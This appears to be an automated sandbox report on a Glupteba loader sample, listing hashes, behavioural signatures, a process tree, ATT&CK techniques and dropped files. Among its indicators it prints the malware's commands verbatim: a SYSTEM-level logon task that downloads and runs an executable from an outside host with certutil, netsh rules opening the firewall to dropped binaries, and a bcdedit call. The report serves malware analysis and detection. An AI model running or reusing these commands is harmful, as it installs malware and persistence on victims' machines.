glupteba | 505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc

General

Target

505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
Size

3.8MB
MD5

f3e9deb6281e64b2bd6781c0af13ef7e
SHA1

bea6d16b1d69e35f0816e6706b94b676da9cdc3b
SHA256

505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc
SHA512

f6b0ca4440def5f17c339c9d4095eaf7293d29daa84b3bce5cfba0ccb3287b1097df96136d92f9d09e1f49417765906d55b36ccef161ee52b36cfb2d7d34eaac

Score

10^/10

glupteba dropper evasion loader

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2628-132-0x0000000000400000-0x0000000000D28000-memory.dmp	family_glupteba

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 3280 created 2628 3280 svchost.exe 505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

1284 bcdedit.exe

description	pid	process	target process
PID 3280 created 2628	3280	svchost.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe

pid	process
1284	bcdedit.exe

Program crash 56 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1424	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
4860	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
2688	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
1956	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
1964	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
3132	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
2620	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
4448	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
2184	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
3940	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
3444	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
2268	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
1608	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
5020	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
2920	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
1076	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
1684	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
2064	2628	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
1780	2540	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
4928	2540	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
1536	2540	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
2216	2540	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
3456	2540	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
4140	2540	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
1556	2540	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
1516	2540	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
4916	2540	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
1140	2540	WerFault.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
3992	1080	WerFault.exe	csrss.exe
5068	1080	WerFault.exe	csrss.exe
744	1080	WerFault.exe	csrss.exe
1584	1080	WerFault.exe	csrss.exe
2676	1080	WerFault.exe	csrss.exe
2692	1080	WerFault.exe	csrss.exe
1960	1080	WerFault.exe	csrss.exe
4100	1080	WerFault.exe	csrss.exe
4212	1080	WerFault.exe	csrss.exe
2724	1080	WerFault.exe	csrss.exe
1324	1080	WerFault.exe	csrss.exe
1564	1080	WerFault.exe	csrss.exe
1876	1080	WerFault.exe	csrss.exe
4744	1080	WerFault.exe	csrss.exe
2696	1080	WerFault.exe	csrss.exe
4476	1080	WerFault.exe	csrss.exe
2236	1080	WerFault.exe	csrss.exe
4756	1080	WerFault.exe	csrss.exe
4304	1080	WerFault.exe	csrss.exe
3412	1080	WerFault.exe	csrss.exe
1076	1080	WerFault.exe	csrss.exe
2656	1080	WerFault.exe	csrss.exe
1536	1080	WerFault.exe	csrss.exe
3460	1080	WerFault.exe	csrss.exe
4644	1080	WerFault.exe	csrss.exe
3708	1080	WerFault.exe	csrss.exe
4820	1080	WerFault.exe	csrss.exe
5052	1080	WerFault.exe	csrss.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1404 schtasks.exe
3204 schtasks.exe

pid	process
1404	schtasks.exe
3204	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe

pid	process
2628	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
2628	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
2540	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
2540	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2628	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
Token: SeImpersonatePrivilege	2628	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
Token: SeTcbPrivilege	3280	svchost.exe
Token: SeTcbPrivilege	3280	svchost.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 3280 wrote to memory of 2540	3280	svchost.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
PID 3280 wrote to memory of 2540	3280	svchost.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
PID 3280 wrote to memory of 2540	3280	svchost.exe	505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe

C:\Users\Admin\AppData\Local\Temp\505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
"C:\Users\Admin\AppData\Local\Temp\505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 368
2⤵
- Program crash
PID:1424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 376
2⤵
- Program crash
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 376
2⤵
- Program crash
PID:2688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 608
2⤵
- Program crash
PID:1956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 700
2⤵
- Program crash
PID:1964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 724
2⤵
- Program crash
PID:3132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 724
2⤵
- Program crash
PID:2620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 756
2⤵
- Program crash
PID:4448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 780
2⤵
- Program crash
PID:2184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 752
2⤵
- Program crash
PID:3940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 744
2⤵
- Program crash
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 904
2⤵
- Program crash
PID:2268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 664
2⤵
- Program crash
PID:1608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 796
2⤵
- Program crash
PID:5020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 780
2⤵
- Program crash
PID:2920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 832
2⤵
- Program crash
PID:1076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 872
2⤵
- Program crash
PID:1684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 832
2⤵
- Program crash
PID:2064

C:\Users\Admin\AppData\Local\Temp\505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe
"C:\Users\Admin\AppData\Local\Temp\505ee63a06dd9e19f53361a76d44f67da6e47b2e85dca25eab46021ae9105bdc.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 332
3⤵
- Program crash
PID:1780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 332
3⤵
- Program crash
PID:4928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 392
3⤵
- Program crash
PID:1536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 468
3⤵
- Program crash
PID:2216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 684
3⤵
- Program crash
PID:3456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 684
3⤵
- Program crash
PID:4140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 708
3⤵
- Program crash
PID:1556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 716
3⤵
- Program crash
PID:1516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 732
3⤵
- Program crash
PID:4916

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:620

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"
3⤵
PID:444

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes
4⤵
PID:4568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 820
3⤵
- Program crash
PID:1140

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:1080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 368
4⤵
- Program crash
PID:3992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 372
4⤵
- Program crash
PID:5068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 392
4⤵
- Program crash
PID:744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 576
4⤵
- Program crash
PID:1584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 576
4⤵
- Program crash
PID:2676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 600
4⤵
- Program crash
PID:2692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 668
4⤵
- Program crash
PID:1960

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1404

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:3204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 808
4⤵
- Program crash
PID:4100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 924
4⤵
- Program crash
PID:4212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 940
4⤵
- Program crash
PID:2724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 940
4⤵
- Program crash
PID:1324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 912
4⤵
- Program crash
PID:1564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 972
4⤵
- Program crash
PID:1876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1072
4⤵
- Program crash
PID:4744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1004
4⤵
- Program crash
PID:2696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1052
4⤵
- Program crash
PID:4476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 956
4⤵
- Program crash
PID:2236

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:1284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 972
4⤵
- Program crash
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 984
4⤵
- Program crash
PID:4304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 840
4⤵
- Program crash
PID:3412

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1052
4⤵
- Program crash
PID:1076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1108
4⤵
- Program crash
PID:2656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1208
4⤵
- Program crash
PID:1536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1224
4⤵
- Program crash
PID:3460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1268
4⤵
- Program crash
PID:4644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1272
4⤵
- Program crash
PID:3708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1220
4⤵
- Program crash
PID:4820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1020
4⤵
- Program crash
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2628 -ip 2628
1⤵
PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2628 -ip 2628
1⤵
PID:4664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2628 -ip 2628
1⤵
PID:1720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2628 -ip 2628
1⤵
PID:976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2628 -ip 2628
1⤵
PID:2936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2628 -ip 2628
1⤵
PID:4108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2628 -ip 2628
1⤵
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2628 -ip 2628
1⤵
PID:4416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2628 -ip 2628
1⤵
PID:3596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2628 -ip 2628
1⤵
PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2628 -ip 2628
1⤵
PID:4128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2628 -ip 2628
1⤵
PID:2024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2628 -ip 2628
1⤵
PID:1772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2628 -ip 2628
1⤵
PID:4748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2628 -ip 2628
1⤵
PID:4548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2628 -ip 2628
1⤵
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2628 -ip 2628
1⤵
PID:2492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2628 -ip 2628
1⤵
PID:224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2540 -ip 2540
1⤵
PID:3924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2540 -ip 2540
1⤵
PID:1808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2540 -ip 2540
1⤵
PID:3052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2540 -ip 2540
1⤵
PID:4044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2540 -ip 2540
1⤵
PID:2700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2540 -ip 2540
1⤵
PID:5064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2540 -ip 2540
1⤵
PID:4588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2540 -ip 2540
1⤵
PID:3056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2540 -ip 2540
1⤵
PID:4620

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
PID:4792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2540 -ip 2540
1⤵
PID:4864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1080 -ip 1080
1⤵
PID:4404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1080 -ip 1080
1⤵
PID:3648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1080 -ip 1080
1⤵
PID:1388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1080 -ip 1080
1⤵
PID:1356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1080 -ip 1080
1⤵
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1080 -ip 1080
1⤵
PID:1544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1080 -ip 1080
1⤵
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1080 -ip 1080
1⤵
PID:1996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1080 -ip 1080
1⤵
PID:328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1080 -ip 1080
1⤵
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1080 -ip 1080
1⤵
PID:4372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1080 -ip 1080
1⤵
PID:5032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1080 -ip 1080
1⤵
PID:4248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1080 -ip 1080
1⤵
PID:2524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1080 -ip 1080
1⤵
PID:2408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1080 -ip 1080
1⤵
PID:4516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1080 -ip 1080
1⤵
PID:3896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1080 -ip 1080
1⤵
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1080 -ip 1080
1⤵
PID:2244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1080 -ip 1080
1⤵
PID:5020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1080 -ip 1080
1⤵
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1080 -ip 1080
1⤵
PID:1200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1080 -ip 1080
1⤵
PID:3684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1080 -ip 1080
1⤵
PID:1836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1080 -ip 1080
1⤵
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1080 -ip 1080
1⤵
PID:3152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1080 -ip 1080
1⤵
PID:2168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1080 -ip 1080
1⤵
PID:2548

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
589KB

MD5
b2341978a2594757c56c2abb60bf1a40

SHA1
e1e10b636ca1d96c5c0f20e5fe82e0fa241c9716

SHA256
eca05c012bc8fb869461153aa3d0dc93716d20fb04873dcd86bbf8c5add70a60

SHA512
7d34d9a9bdf81e32e3205e078350fa230b0d112a68ce07ff9b8ed8264c3ac85702e41caecc6c86c5b24f6fbb715184b77ef127fb841dfdf89bf60c062531535b

Download Submit
C:\Windows\rss\csrss.exe
Filesize
1.9MB

MD5
38947f2f0b038d22cd9d5e1c969d9e41

SHA1
c7e779c8d7013586f8b94685b4b60c6b8e498705

SHA256
683e5c043a9c2e14e5d960c33000258296aae3b92b8c791b7ea1db769b5b5d8c

SHA512
c735e93965b042969e73f56bf47b7d38d86fe456315c5b426f79fe546a552a8998dfc4f02ab656745740b6842743436ea1cfd6d65be8a92aa73aa4ba0b3bd59b

Download Submit
C:\Windows\rss\csrss.exe
Filesize
1.9MB

MD5
b775c4522757633aa85c8ff4259c980d

SHA1
29acdb51fbd8aed4f4dc41b6811366360e959383

SHA256
8f52449aa9bf4c07721140deab3a18349a5a2719b9a811b7b6b12ab00c2e806c

SHA512
